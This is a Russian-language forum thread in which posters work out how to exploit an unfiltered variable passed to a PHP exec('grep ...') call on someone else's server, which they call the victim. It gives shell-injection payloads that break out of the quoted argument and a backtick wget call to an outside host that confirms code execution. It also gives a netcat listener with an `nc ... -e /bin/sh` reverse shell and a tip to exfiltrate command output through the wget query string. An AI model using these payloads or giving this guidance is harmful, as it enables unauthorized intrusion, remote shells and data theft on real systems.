Недавно ковырял один php код и нашел интересную строку: PHP: exec("grep -i \"$search\" base.dat",$execAr); при этом перемененная search ни где не фильтруется я попробовал сначала так: PHP: any search" base.dat; echo "unknown error" > err.log # но err.log не создался тогда я попробовал так: PHP: any search" base.dat; echo "категрия|название|single|a45cab8f313e7b||0|0||instock|||описание\n" # но результат не изменился, хотя если echo выполнилось, то моя строчка должна была попасть execAr и вывестись в результатах поиска подскажите как юзать, а то я линух только на картинках видел
не так не получилось, попробовал `wget http://httpz.ru/nktvzvbkabw.gif?hello+world`, работает, узнал, что это red hat, как мне теперь id переслать ?
тогда понятно, у тебя нет прав на запись в текущую директорию, ищи диру доступную для запись либо проще на своём серваке сделай nc -n -vv -l -p 9999 на жертве `nc ip_tvoego_serva 9999 -e /bin/sh`
надо вместо в `wget http://httpz.ru/nktvzvbkabw.gif?hello+world` вместо hello world посылать результат выполнения команды help me people